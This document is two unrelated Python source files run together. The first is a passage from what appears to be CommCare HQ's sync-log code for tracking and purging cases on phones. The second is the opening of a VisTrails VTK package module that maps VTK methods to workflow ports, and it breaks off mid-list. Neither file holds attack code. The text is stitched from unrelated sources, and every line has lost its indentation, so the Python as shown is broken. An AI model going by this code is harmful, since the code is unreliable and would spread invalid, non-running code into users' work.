relevant = IndexTree.get_all_dependencies(
case_id,
closed_cases=self.closed_cases,
child_index_tree=self.index_tree,
extension_index_tree=self.extension_index_tree,
cached_child_map=_reverse_index_map(self.index_tree.indices),
cached_extension_map=_reverse_index_map(self.extension_index_tree.indices),
)
logger.debug("Relevant cases: {}".format(relevant))
return relevant
def _get_available_cases(self, relevant):
"""
Mark all relevant cases that are open and have no outgoing extension indexes
as available. Traverse incoming extension indexes which don't lead to closed
cases, mark all touched cases as available
"""
incoming_extensions = _reverse_index_map(self.extension_index_tree.indices)
available = {case for case in relevant
if case not in self.closed_cases
and (not self.extension_index_tree.indices.get(case) or self.index_tree.indices.get(case))}
new_available = set() | available
while new_available:
case_to_check = new_available.pop()
for incoming_extension in incoming_extensions.get(case_to_check, []):
if incoming_extension not in self.closed_cases:
new_available.add(incoming_extension)
available = available | new_available
logger.debug("Available cases: {}".format(available))
return available
def _get_live_cases(self, available):
"""
Mark all relevant, owned, available cases as live. Traverse incoming
extension indexes which don't lead to closed cases, mark all touched
cases as available.
"""
incoming_extensions = _reverse_index_map(self.extension_index_tree.indices)
live = {case for case in available if case in self.primary_case_ids}
new_live = set() | live
checked = set()
while new_live:
case_to_check = new_live.pop()
checked.add(case_to_check)
new_live = new_live | IndexTree.get_all_outgoing_cases(
case_to_check,
self.index_tree,
self.extension_index_tree
)
new_live = new_live | IndexTree.traverse_incoming_extensions(
case_to_check,
self.extension_index_tree,
self.closed_cases, cached_map=incoming_extensions
)
new_live = new_live - checked
live = live | new_live
logger.debug("live cases: {}".format(live))
return live
def _remove_cases_purge_indices(self, all_to_remove, checked_case_id):
"""Remove all cases marked for removal. Traverse child cases and try to purge those too."""
logger.debug("cases to to_remove: {}".format(all_to_remove))
for to_remove in all_to_remove:
indices = self.index_tree.indices.get(to_remove, {})
self._remove_case(to_remove, all_to_remove, checked_case_id)
for referenced_case in indices.values():
is_dependent_case = referenced_case in self.dependent_case_ids_on_phone
already_primed_for_removal = referenced_case in all_to_remove
if is_dependent_case and not already_primed_for_removal and referenced_case != checked_case_id:
self.purge(referenced_case)
def _remove_case(self, to_remove, all_to_remove, checked_case_id):
"""Removes case from index trees, case_ids_on_phone and dependent_case_ids_on_phone if pertinent"""
logger.debug('removing: {}'.format(to_remove))
deleted_indices = self.index_tree.indices.pop(to_remove, {})
deleted_indices.update(self.extension_index_tree.indices.pop(to_remove, {}))
self._validate_case_removal(to_remove, all_to_remove, deleted_indices, checked_case_id)
try:
self.case_ids_on_phone.remove(to_remove)
except KeyError:
_assert = soft_assert(to=['czue' + '@' + 'dimagi.com'], exponential_backoff=False)
should_fail_softly = _domain_has_legacy_toggle_set()
if should_fail_softly:
pass
else:
# this is only a soft assert for now because of http://manage.dimagi.com/default.asp?181443
# we should convert back to a real Exception when we stop getting any of these
_assert(False, 'case {} already removed from sync log {}'.format(to_remove, self._id))
if to_remove in self.dependent_case_ids_on_phone:
self.dependent_case_ids_on_phone.remove(to_remove)
def _validate_case_removal(self, case_to_remove, all_to_remove, deleted_indices, checked_case_id):
"""Traverse immediate outgoing indices. Validate that these are also candidates for removal."""
if case_to_remove == checked_case_id:
return
for index in deleted_indices.values():
if not _domain_has_legacy_toggle_set():
# unblocking http://manage.dimagi.com/default.asp?185850#1039475
_assert = soft_assert(to=['czue' + '@' + 'dimagi.com'], exponential_backoff=True,
fail_if_debug=True)
_assert(index in (all_to_remove | set([checked_case_id])),
"expected {} in {} but wasn't".format(index, all_to_remove))
def _add_primary_case(self, case_id):
self.case_ids_on_phone.add(case_id)
if case_id in self.dependent_case_ids_on_phone:
self.dependent_case_ids_on_phone.remove(case_id)
def _add_index(self, index, case_update):
logger.debug('adding index {} --<{}>--> {} ({}).'.format(
index.case_id, index.relationship, index.referenced_id, index.identifier))
if index.relationship == const.CASE_INDEX_EXTENSION:
self._add_extension_index(index, case_update)
else:
self._add_child_index(index)
def _add_extension_index(self, index, case_update):
assert index.relationship == const.CASE_INDEX_EXTENSION
self.extension_index_tree.set_index(index.case_id, index.identifier, index.referenced_id)
if index.referenced_id not in self.case_ids_on_phone:
self.case_ids_on_phone.add(index.referenced_id)
self.dependent_case_ids_on_phone.add(index.referenced_id)
case_child_indices = [idx for idx in case_update.indices_to_add
if idx.relationship == const.CASE_INDEX_CHILD
and idx.referenced_id == index.referenced_id]
if not case_child_indices and not case_update.is_live:
# this case doesn't also have child indices, and it is not owned, so it is dependent
self.dependent_case_ids_on_phone.add(index.case_id)
def _add_child_index(self, index):
assert index.relationship == const.CASE_INDEX_CHILD
self.index_tree.set_index(index.case_id, index.identifier, index.referenced_id)
if index.referenced_id not in self.case_ids_on_phone:
self.case_ids_on_phone.add(index.referenced_id)
self.dependent_case_ids_on_phone.add(index.referenced_id)
def _delete_index(self, index):
self.index_tree.delete_index(index.case_id, index.identifier)
self.extension_index_tree.delete_index(index.case_id, index.identifier)
def update_phone_lists(self, xform, case_list):
made_changes = False
logger.debug('updating sync log for {}'.format(self.user_id))
logger.debug('case ids before update: {}'.format(', '.join(self.case_ids_on_phone)))
logger.debug('dependent case ids before update: {}'.format(', '.join(self.dependent_case_ids_on_phone)))
logger.debug('index tree before update: {}'.format(self.index_tree))
class CaseUpdate(object):
def __init__(self, case_id, owner_ids_on_phone):
self.case_id = case_id
self.owner_ids_on_phone = owner_ids_on_phone
self.was_live_previously = True
self.final_owner_id = None
self.is_closed = None
self.indices_to_add = []
self.indices_to_delete = []
@property
def extension_indices_to_add(self):
return [index for index in self.indices_to_add
if index.relationship == const.CASE_INDEX_EXTENSION]
def has_extension_indices_to_add(self):
return len(self.extension_indices_to_add) > 0
@property
def is_live(self):
"""returns whether an update is live for a specifc set of owner_ids"""
if self.is_closed:
return False
elif self.final_owner_id is None:
# we likely didn't touch owner_id so just default to whatever it was previously
return self.was_live_previously
else:
return self.final_owner_id in self.owner_ids_on_phone
ShortIndex = namedtuple('ShortIndex', ['case_id', 'identifier', 'referenced_id', 'relationship'])
# this is a variable used via closures in the function below
owner_id_map = {}
def get_latest_owner_id(case_id, action=None):
# "latest" just means as this forms actions are played through
if action is not None:
owner_id_from_action = action.updated_known_properties.get("owner_id")
if owner_id_from_action is not None:
owner_id_map[case_id] = owner_id_from_action
return owner_id_map.get(case_id, None)
all_updates = {}
for case in case_list:
if case.case_id not in all_updates:
logger.debug('initializing update for case {}'.format(case.case_id))
all_updates[case.case_id] = CaseUpdate(case_id=case.case_id,
owner_ids_on_phone=self.owner_ids_on_phone)
case_update = all_updates[case.case_id]
case_update.was_live_previously = case.case_id in self.primary_case_ids
actions = case.get_actions_for_form(xform)
for action in actions:
logger.debug('{}: {}'.format(case.case_id, action.action_type))
owner_id = get_latest_owner_id(case.case_id, action)
if owner_id is not None:
case_update.final_owner_id = owner_id
if action.action_type == const.CASE_ACTION_INDEX:
for index in action.indices:
if index.referenced_id:
case_update.indices_to_add.append(
ShortIndex(case.case_id, index.identifier, index.referenced_id, index.relationship)
)
else:
case_update.indices_to_delete.append(
ShortIndex(case.case_id, index.identifier, None, None)
)
elif action.action_type == const.CASE_ACTION_CLOSE:
case_update.is_closed = True
non_live_updates = []
for case in case_list:
case_update = all_updates[case.case_id]
if case_update.is_live:
logger.debug('case {} is live.'.format(case_update.case_id))
if case.case_id not in self.case_ids_on_phone:
self._add_primary_case(case.case_id)
made_changes = True
elif case.case_id in self.dependent_case_ids_on_phone:
self.dependent_case_ids_on_phone.remove(case.case_id)
made_changes = True
for index in case_update.indices_to_add:
self._add_index(index, case_update)
made_changes = True
for index in case_update.indices_to_delete:
self._delete_index(index)
made_changes = True
else:
# process the non-live updates after all live are already processed
non_live_updates.append(case_update)
# populate the closed cases list before processing non-live updates
if case_update.is_closed:
self.closed_cases.add(case_update.case_id)
for update in non_live_updates:
logger.debug('case {} is NOT live.'.format(update.case_id))
if update.has_extension_indices_to_add():
# non-live cases with extension indices should be added and processed
self.case_ids_on_phone.add(update.case_id)
for index in update.indices_to_add:
self._add_index(index, update)
made_changes = True
for update in non_live_updates:
if update.case_id in self.case_ids_on_phone:
# try purging the case
self.purge(update.case_id)
if update.case_id in self.case_ids_on_phone:
# if unsuccessful, process the rest of the update
for index in update.indices_to_add:
self._add_index(index, update)
for index in update.indices_to_delete:
self._delete_index(index)
made_changes = True
logger.debug('case ids after update: {}'.format(', '.join(self.case_ids_on_phone)))
logger.debug('dependent case ids after update: {}'.format(', '.join(self.dependent_case_ids_on_phone)))
logger.debug('index tree after update: {}'.format(self.index_tree))
logger.debug('extension index tree after update: {}'.format(self.extension_index_tree))
if made_changes or case_list:
try:
if made_changes:
logger.debug('made changes, saving.')
self.last_submitted = datetime.utcnow()
self.rev_before_last_submitted = self._rev
self.save()
if case_list:
try:
self.invalidate_cached_payloads()
except ResourceConflict:
# this operation is harmless so just blindly retry and don't
# reraise if it goes through the second time
SimplifiedSyncLog.get(self._id).invalidate_cached_payloads()
except ResourceConflict:
logging.exception('doc update conflict saving sync log {id}'.format(
id=self._id,
))
raise
def purge_dependent_cases(self):
"""
Attempt to purge any dependent cases from the sync log.
"""
# this is done when migrating from old formats or during initial sync
# to purge non-relevant dependencies
for dependent_case_id in list(self.dependent_case_ids_on_phone):
# need this additional check since the case might have already been purged/remove
# as a result of purging the child case
if dependent_case_id in self.dependent_case_ids_on_phone:
# this will be a no-op if the case cannot be purged due to dependencies
self.purge(dependent_case_id)
@classmethod
def from_other_format(cls, other_sync_log):
"""
Migrate from the old SyncLog format to this one.
"""
if isinstance(other_sync_log, SyncLog):
previous_log_footprint = set(other_sync_log.get_footprint_of_cases_on_phone())
def _add_state_contributions(new_sync_log, case_state, is_dependent=False):
if case_state.case_id in previous_log_footprint:
new_sync_log.case_ids_on_phone.add(case_state.case_id)
for index in case_state.indices:
new_sync_log.index_tree.set_index(case_state.case_id, index.identifier,
index.referenced_id)
if is_dependent:
new_sync_log.dependent_case_ids_on_phone.add(case_state.case_id)
ret = cls.wrap(other_sync_log.to_json())
for case_state in other_sync_log.cases_on_phone:
_add_state_contributions(ret, case_state)
dependent_case_ids = set()
for case_state in other_sync_log.dependent_cases_on_phone:
if case_state.case_id in previous_log_footprint:
_add_state_contributions(ret, case_state, is_dependent=True)
dependent_case_ids.add(case_state.case_id)
# try to purge any dependent cases - the old format does this on
# access, but the new format does it ahead of time and always assumes
# its current state is accurate.
ret.purge_dependent_cases()
# set and cleanup other properties
ret.log_format = LOG_FORMAT_SIMPLIFIED
del ret['last_seq']
del ret['cases_on_phone']
del ret['dependent_cases_on_phone']
ret.migrated_from = other_sync_log.to_json()
return ret
else:
return super(SimplifiedSyncLog, cls).from_other_format(other_sync_log)
def tests_only_get_cases_on_phone(self):
# hack - just for tests
return [CaseState(case_id=id) for id in self.case_ids_on_phone]
def test_only_clear_cases_on_phone(self):
self.case_ids_on_phone = set()
def test_only_get_dependent_cases_on_phone(self):
# hack - just for tests
return [CaseState(case_id=id) for id in self.dependent_case_ids_on_phone]
def _domain_has_legacy_toggle_set():
# old versions of commcare (< 2.10ish) didn't purge on form completion
# so can still modify cases that should no longer be on the phone.
domain = get_request_domain()
return LEGACY_SYNC_SUPPORT.enabled(domain) if domain else False
def get_sync_log_doc(doc_id):
try:
return SyncLog.get_db().get(doc_id)
except ResourceNotFound:
legacy_doc = get_db(None).get(doc_id, attachments=True)
del legacy_doc['_rev'] # remove the rev so we can save this to the new DB
return legacy_doc
def get_properly_wrapped_sync_log(doc_id):
"""
Looks up and wraps a sync log, using the class based on the 'log_format' attribute.
Defaults to the existing legacy SyncLog class.
"""
return properly_wrap_sync_log(get_sync_log_doc(doc_id))
def properly_wrap_sync_log(doc):
return get_sync_log_class_by_format(doc.get('log_format')).wrap(doc)
def get_sync_log_class_by_format(format):
return {
LOG_FORMAT_LEGACY: SyncLog,
LOG_FORMAT_SIMPLIFIED: SimplifiedSyncLog,
}.get(format, SyncLog)
class OwnershipCleanlinessFlag(models.Model):
"""
Stores whether an owner_id is "clean" aka has a case universe only belonging
to that ID.
We use this field to optimize restores.
"""
domain = models.CharField(max_length=100, db_index=True)
owner_id = models.CharField(max_length=100, db_index=True)
is_clean = models.BooleanField(default=False)
last_checked = models.DateTimeField()
hint = models.CharField(max_length=100, null=True, blank=True)
def save(self, force_insert=False, force_update=False, using=None,
update_fields=None):
self.last_checked = datetime.utcnow()
super(OwnershipCleanlinessFlag, self).save(force_insert, force_update, using, update_fields)
@classmethod
def get_for_owner(cls, domain, owner_id):
return cls.objects.get_or_create(domain=domain, owner_id=owner_id)[0]
class Meta:
app_label = 'phone'
unique_together = [('domain', 'owner_id')]
| |
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
################################################################################
# VTK Package for VisTrails
################################################################################
from core.bundles import py_import
vtk = py_import('vtk', {'linux-ubuntu': 'python-vtk',
'linux-fedora': 'vtk-python'})
from core.utils import all, any, VistrailsInternalError, InstanceObject
from core.debug import debug
from core.modules.basic_modules import Integer, Float, String, File, \
Variant, Color, Boolean, identifier as basic_pkg
from core.modules.module_registry import get_module_registry
from core.modules.vistrails_module import new_module, ModuleError
from core.vistrail.connection import Connection
from base_module import vtkBaseModule
from class_tree import ClassTree
from vtk_parser import VTKMethodParser
import re
import os.path
from itertools import izip
from vtkcell import VTKCell
import tf_widget
import offscreen
import fix_classes
import inspectors
from hasher import vtk_hasher
import operator
import re
import sys
from core.upgradeworkflow import UpgradeWorkflowHandler
#TODO: Change the Core > Module > Registry > Add Input : To support vector as type.
################################################################################
# filter some deprecation warnings coming from the fact that vtk calls
# range() with float parameters
import warnings
warnings.filterwarnings("ignore",
message="integer argument expected, got float")
################################################################################
v = vtk.vtkVersion()
version = [v.GetVTKMajorVersion(),
v.GetVTKMinorVersion(),
v.GetVTKBuildVersion()]
if version < [5, 0, 4]:
def get_description_class(klass):
"""Because sometimes we need to patch VTK classes, the klass that
has the methods is different than the klass we want to
instantiate. get_description_class makes sure that for patched
classes we get the correct one."""
try:
return fix_classes.description[klass]
except KeyError:
return klass
else:
# On VTK 5.0.4, we use the id of the class to hash, because it
# seems that VTK hasn't implemented hash() correctly for their
# classes.
def get_description_class(klass):
"""Because sometimes we need to patch VTK classes, the klass that
has the methods is different than the klass we want to
instantiate. get_description_class makes sure that for patched
classes we get the correct one."""
try:
return fix_classes.description[id(klass)]
except KeyError:
return klass
parser = VTKMethodParser()
typeMapDict = {'int': Integer,
'long': Integer,
'float': Float,
'char*': String,
'char *': String,
'string': String,
'char': String,
'const char*': String,
'const char *': String,
'[float': Float,
'float]': Float,
'[int': Integer,
'int]': Integer}
typeMapDictValues = [Integer, Float, String]
file_name_pattern = re.compile('.*FileName$')
set_file_name_pattern = re.compile('Set.*FileName$')
def resolve_overloaded_name(name, ix, signatures):
# VTK supports static overloading, VisTrails does not. The
# solution is to check whether the current function has
# overloads and change the names appropriately.
if len(signatures) == 1:
return name
else:
return name + '_' + str(ix+1)
def typeMap(name, package=None):
""" typeMap(name: str) -> Module
Convert from C/C++ types into VisTrails Module type
"""
if package is None:
package = identifier
if type(name) == tuple:
return [typeMap(x, package) for x in name]
if name in typeMapDict:
return typeMapDict[name]
else:
registry = get_module_registry()
if not registry.has_descriptor_with_name(package, name):
return None
else:
return registry.get_descriptor_by_name(package,
name).module
def get_method_signature(method, docum='', name=''):
""" get_method_signature(method: vtkmethod) -> [ret, arg]
Re-wrap Prabu's method to increase performance
"""
doc = method.__doc__ if docum=='' else docum
tmptmp = doc.split('\n')
tmp = []
for l in tmptmp:
l = l.strip('\n \t')
if l.startswith('V.') or l.startswith('C++:'):
tmp.append(l)
else:
if (len(tmp) != 0):
tmp[-1] = tmp[-1] + ' ' + l
tmp.append('')
sig = []
pat = re.compile(r'\b')
# Remove all the C++ function signatures and V.<method_name> field
name = method.__name__ if name == '' else name
offset = 2+len(name)
for i in xrange(len(tmp)):
s = tmp[i]
if s=='': break
if i%2==0:
x = s.split('->')
arg = x[0].strip()[offset:]
if len(x) == 1: # No return value
ret = None
else:
ret = x[1].strip()
# Remove leading and trailing parens for arguments.
arg = arg[1:-1]
if not arg:
arg = None
if arg and arg[-1] == ')':
arg = arg + ','
# Now quote the args and eval them. Easy!
if ret and ret[:3]!='vtk':
try:
ret = eval(pat.sub('\"', ret))
except:
continue
if arg:
if arg.find('(')!=-1:
try:
arg = eval(pat.sub('\"', arg))
except:
continue
else:
arg = arg.split(', ')
if len(arg)>1:
arg = tuple(arg)
else:
arg = arg[0]
if type(arg) == str:
arg = [arg]
sig.append(([ret], arg))
return sig
def prune_signatures(module, name, signatures, output=False):
"""prune_signatures tries to remove redundant signatures to reduce
overloading. It _mutates_ the given parameter.
It does this by performing several operations:
1) It compares a 'flattened' version of the types
against the other 'flattened' signatures. If any of them match, we
keep only the 'flatter' ones.
A 'flattened' signature is one where parameters are not inside a
tuple.
2) We explicitly forbid a few signatures based on modules and names
"""
# yeah, this is Omega(n^2) on the number of overloads. Who cares?
def flatten(type_):
if type_ is None:
return []
def convert(entry):
if type(entry) == tuple:
return list(entry)
elif type(entry) == str:
return [entry]
else:
result = []
first = True
lastList = True
for e in entry:
if (type(e) == list):
if lastList == False: result[len(result)] = result[len(result)] + ']'
aux = e
aux.reverse()
aux[0] = '[' + aux[0]
aux[-1] = aux[-1] + ']'
result.extend(aux)
lastList = True
else:
if first: e = '[' + e
result.append(e)
lastList = False
first = False
return result
result = []
for entry in type_:
result.extend(convert(entry))
return result
flattened_entries = [flatten(sig[1]) for
sig in signatures]
def hit_count(entry):
result = 0
for entry in flattened_entries:
if entry in flattened_entries:
result += 1
return result
hits = [hit_count(entry) for entry in flattened_entries]
def forbidden(flattened, hit_count, original):
if (issubclass(get_description_class(module.vtkClass), vtk.vtk3DWidget) and
name == 'PlaceWidget' and
flattened == []):
return True
# We forbid this because addPorts hardcodes this but
# SetInputArrayToProcess is an exception for the InfoVis
# package
if (get_description_class(module.vtkClass) == vtk.vtkAlgorithm and
name!='SetInputArrayToProcess'):
return True
return False
# This is messy: a signature is only allowed if there's no
# explicit disallowing of it. Then, if it's not overloaded,
# it is also allowed. If it is overloaded and not the flattened
# version, it is pruned. If these are output ports, there can be
# no parameters.
def passes(flattened, hit_count, original):
if forbidden(flattened, hit_count, original):
return False
if hit_count == 1:
return True
if original[1] is None:
return True
if output and len(original[1]) > 0:
return False
if hit_count > 1 and len(original[1]) == len(flattened):
return True
return False
signatures[:] = [original for (flattened, hit_count, original)
in izip(flattened_entries,
hits,
signatures)
if passes(flattened, hit_count, original)]
#then we remove the duplicates, if necessary
unique_signatures = []
#Remove the arrays and tuples inside the signature
# in order to transform it in a single array
#Also remove the '[]' from the Strings
def removeBracts(signatures):
result = []
stack = list(signatures)
while (len(stack) != 0):
curr = stack.pop(0)
if (type(curr) == String or type(curr) == str):
c = curr.replace('[', '')
c = c.replace(']', '')
result.append(c)
elif (curr == None):
result.append(curr)
elif (type(curr) == list):
curr.reverse()
for c in curr: stack.insert(0, c)
elif (type(curr) == tuple):
cc = list(curr)
cc.reverse()
for c in cc: stack.insert(0, c)
else:
result.append(curr)
return result
unique2 = []
for s in signatures:
aux = removeBracts(s)
if not unique2.count(aux):
unique_signatures.append(s)
unique2.append(aux)
signatures[:] = unique_signatures
disallowed_classes = set(
[
'vtkCriticalSection',
'vtkDataArraySelection',
'vtkDebugLeaks',
'vtkDirectory',
'vtkDynamicLoader',
'vtkFunctionParser',
'vtkGarbageCollector',
'vtkHeap',
'vtkInformationKey',
'vtkInstantiator',
'vtkLogLookupTable', # VTK: use vtkLookupTable.SetScaleToLog10() instead
'vtkMath',
'vtkModelMetadata',
'vtkMultiProcessController',
'vtkMutexLock',
'vtkOutputWindow',
'vtkPriorityQueue',
'vtkReferenceCount',
'vtkRenderWindowCollection',
'vtkRenderWindowInteractor',
'vtkTesting',
'vtkWindow',
'vtkContext2D', #Not working for VTK 5.7.0
'vtkPLYWriter', #Not working for VTK 5.7.0.
'vtkBooleanTexture', #Not working for VTK 5.7.0
'vtkImageMaskBits', #Not working for VTK 5.7.0
'vtkHardwareSelector',#Not working for VTK 5.7.0
])
def is_class_allowed(module):
if module is None:
return False
try:
name = module.__name__
return not (name in disallowed_classes)
except AttributeError:
return True
def addAlgorithmPorts(module):
""" addAlgorithmPorts(module: Module) -> None
If module is a subclass of vtkAlgorithm, this function will add all
SetInputConnection([id],[port]) and GetOutputPort([id]) as
SetInputConnection{id}([port]) and GetOutputPort{id}.
"""
if issubclass(get_description_class(module.vtkClass), vtk.vtkAlgorithm):
if get_description_class(module.vtkClass)!=vtk.vtkStructuredPointsGeometryFilter:
# We try to instantiate the class here to get the number of
# ports and to avoid abstract classes
try:
instance = module.vtkClass()
except TypeError:
pass
else:
registry = get_module_registry()
des = registry.get_descriptor_by_name('edu.utah.sci.vistrails.vtk',
'vtkAlgorithmOutput')
for i in xrange(0,instance.GetNumberOfInputPorts()):
registry.add_input_port(module, 'SetInputConnection%d'%i,
des.module)
for i in xrange(0,instance.GetNumberOfOutputPorts()):
registry.add_output_port(module, 'GetOutputPort%d'%i,
des.module)
disallowed_set_get_ports = set(['ReferenceCount',
'InputConnection',
'OutputPort',
'Progress',
'ProgressText',
'InputArrayToProcess',
])
def addSetGetPorts(module, get_set_dict, delayed):
""" addSetGetPorts(module: Module, get_set_dict: dict) -> None
Convert all Setxxx methods of module into input ports and all Getxxx
methods of module into output ports
Keyword arguments:
module --- Module
get_set_dict --- the Set/Get method signatures returned by vtk_parser
"""
klass = get_description_class(module.vtkClass)
registry = get_module_registry()
for name in get_set_dict.iterkeys():
if name in disallowed_set_get_ports: continue
getterMethod = getattr(klass, 'Get%s'%name)
setterMethod = getattr(klass, 'Set%s'%name)
getterSig = get_method_signature(getterMethod)
setterSig = get_method_signature(setterMethod)
if len(getterSig) > 1:
prune_signatures(module, 'Get%s'%name, getterSig, output=True)
for order, getter in enumerate(getterSig):
if getter[1]:
debug("Can't handle getter %s (%s) of class %s: Needs input to "
"get output" % (order+1, name, klass))
continue
if len(getter[0]) != 1:
debug("Can't handle getter %s (%s) of class %s: More than a "
"single output" % (order+1, name, str(klass)))
continue
class_ = typeMap(getter[0][0])
if is_class_allowed(class_):
registry.add_output_port(module, 'Get'+name, class_, True)
if len(setterSig) > 1:
prune_signatures(module, 'Set%s'%name, setterSig)
for ix, setter in enumerate(setterSig):
if setter[1]==None: continue
n = resolve_overloaded_name('Set' + name, ix, setterSig)
if len(setter[1]) == 1 and is_class_allowed(typeMap(setter[1][0])):
registry.add_input_port(module, n,
typeMap(setter[1][0]),
setter[1][0] in typeMapDict)
else:
classes = [typeMap(i) for i in setter[1]]
if all(is_class_allowed(x) for x in classes):
registry.add_input_port(module, n, classes, True)
# Wrap SetFileNames for VisTrails file access
if file_name_pattern.match(name):
registry.add_input_port(module, 'Set' + name[:-4],
(File, 'input file'), False)
# Wrap SetRenderWindow for exporters
elif name == 'RenderWindow':
# cscheid 2008-07-11 This is messy: VTKCell isn't
# registered yet, so we can't use it as a port
# However, we can't register VTKCell before these either,
# because VTKCell requires vtkRenderer. The "right" way would
# be to add all modules first, then all ports. However, that would
# be too slow.
# Workaround: delay the addition of the port by storing
# the information in a list
if registry.has_module('edu.utah.sci.vistrails.spreadsheet',
'SpreadsheetCell'):
delayed.add_input_port.append((module, 'SetVTKCell', VTKCell, False))
# Wrap color methods for VisTrails GUI facilities
elif name == 'DiffuseColor':
registry.add_input_port(module, 'SetDiffuseColorWidget',
(Color, 'color'), True)
elif name == 'Color':
registry.add_input_port(module, 'SetColorWidget',
(Color, 'color'), True)
elif name == 'AmbientColor':
registry.add_input_port(module, 'SetAmbientColorWidget',
(Color, 'color'), True)
elif name == 'SpecularColor':
registry.add_input_port(module, 'SetSpecularColorWidget',
(Color, 'color'), True)
elif name == 'EdgeColor':
registry.add_input_port(module, 'SetEdgeColorWidget',
(Color, 'color'), True)
elif name == 'Background' :
registry.add_input_port(module, 'SetBackgroundWidget',
(Color, 'color'), True)
elif name == 'Background2' :
registry.add_input_port(module, 'SetBackground2Widget',
(Color, 'color'), True)
disallowed_toggle_ports = set(['GlobalWarningDisplay',
'Debug',
])
def addTogglePorts(module, toggle_dict):
""" addTogglePorts(module: Module, toggle_dict: dict) -> None
Convert all xxxOn/Off methods of module into input ports
Keyword arguments:
module --- Module
toggle_dict --- the Toggle method signatures returned by vtk_parser
"""
registry = get_module_registry()
for name in toggle_dict.iterkeys():
if name in disallowed_toggle_ports:
continue
registry.add_input_port(module, name+'On', [], True)
registry.add_input_port(module, name+'Off', [], True)
disallowed_state_ports = set(['SetInputArrayToProcess'])
def addStatePorts(module, state_dict):
""" addStatePorts(module: Module, state_dict: dict) -> None
Convert all SetxxxToyyy methods of module into input ports
Keyword arguments:
module --- Module
state_dict --- the State method signatures returned by vtk_parser
"""
klass = get_description_class(module.vtkClass)
registry = get_module_registry()
for name in state_dict.iterkeys():
for mode in state_dict[name]:
# Creates the port Set foo to bar
field = 'Set'+name+'To'+mode[0]
if field in disallowed_state_ports:
continue
if not registry.has_input_port(module, field):
registry.add_input_port(module, field, [], True)
# Now create the port Set foo with parameter
if hasattr(klass, 'Set%s'%name):
setterMethod = getattr(klass, 'Set%s'%name)
setterSig = get_method_signature(setterMethod)
# if the signature looks like an enum, we'll skip it, it shouldn't
# be necessary
if len(setterSig) > 1:
prune_signatures(module, 'Set%s'%name, setterSig)
for ix, setter in enumerate(setterSig):
n = resolve_overloaded_name('Set' + name, ix, setterSig)
tm = typeMap(setter[1][0])
if len(setter[1]) == 1 and is_class_allowed(tm):
registry.add_input_port(module, n, tm,
setter[1][0] in typeMapDict)
else:
classes = [typeMap(i) for i in setter[1]]
if all(is_class_allowed(x) for x in classes):
registry.add_input_port(module, n, classes, True)
disallowed_other_ports = set(
[
'BreakOnError',
'DeepCopy',
'FastDelete',
'HasObserver',
'HasExecutive',
'INPUT_ARRAYS_TO_PROCESS',
'INPUT_CONNECTION',
'INPUT_IS_OPTIONAL',
'INPUT_IS_REPEATABLE',
'INPUT_PORT',
'INPUT_REQUIRED_DATA_TYPE',
'INPUT_REQUIRED_FIELDS',
'InvokeEvent',
'IsA',
'Modified',
'NewInstance',
'PrintRevisions',
'RemoveAllInputs',
'RemoveObserver',
'RemoveObservers',
'SafeDownCast',
# 'SetInputArrayToProcess',
'ShallowCopy',
'Update',
'UpdateInformation',
'UpdateProgress',
'UpdateWholeExtent',
])
force_not_optional_port = set(
['ApplyViewTheme',
])
def addOtherPorts(module, other_list):
""" addOtherPorts(module: Module, other_list: list) -> None
Convert all other ports such as Insert/Add.... into input/output
Keyword arguments:
module --- Module
other_dict --- any other method signatures that is not
Algorithm/SetGet/Toggle/State type
"""
klass = get_description_class(module.vtkClass)
registry = get_module_registry()
for name in other_list:
if name=='CopyImportVoidPointer':
registry.add_input_port(module, 'CopyImportVoidString', (String, 'value'), False)
if name[:3] in ['Add','Set'] or name[:6]=='Insert':
if name in disallowed_other_ports:
continue
method = getattr(klass, name)
signatures = ""
if not isinstance(method, int):
signatures = get_method_signature(method)
if len(signatures) > 1:
prune_signatures(module, name, signatures)
for (ix, sig) in enumerate(signatures):
([result], params) = sig
types = []
if params:
for p in params:
t = typeMap(p)
if not t:
types = None
break
else: types.append(t)
else:
types = [[]]
if types:
if not all(is_class_allowed(x) for x in types):
continue
n = resolve_overloaded_name(name, ix, signatures)
if len(types)<=1:
registry.add_input_port(module, n, types[0],
types[0] in typeMapDictValues)
else:
registry.add_input_port(module, n, types, True)
else:
if name in disallowed_other_ports:
continue
method = getattr(klass, name)
signatures = ""
if not isinstance(method, int):
signatures = get_method_signature(method)
if len(signatures) > 1:
prune_signatures(module, name, signatures)
for (ix, sig) in enumerate(signatures):
([result], params) = sig
types = []
if params:
paramsList = list(params)
while (len(paramsList) != 0):
p = paramsList.pop(0)
if type(p) == list:
for aux in p: paramsList.insert(0, aux)
else:
types.append(typeMap(p))
else:
types = []
if not all(is_class_allowed(x) for x in types):
continue
if types==[] or (result==None):
n = resolve_overloaded_name(name, ix, signatures)
registry.add_input_port(module, n, types,
not (n in force_not_optional_port))
disallowed_get_ports = set([
'GetClassName',
'GetErrorCode',
'GetNumberOfInputPorts',
'GetNumberOfOutputPorts',
'GetOutputPortInformation',
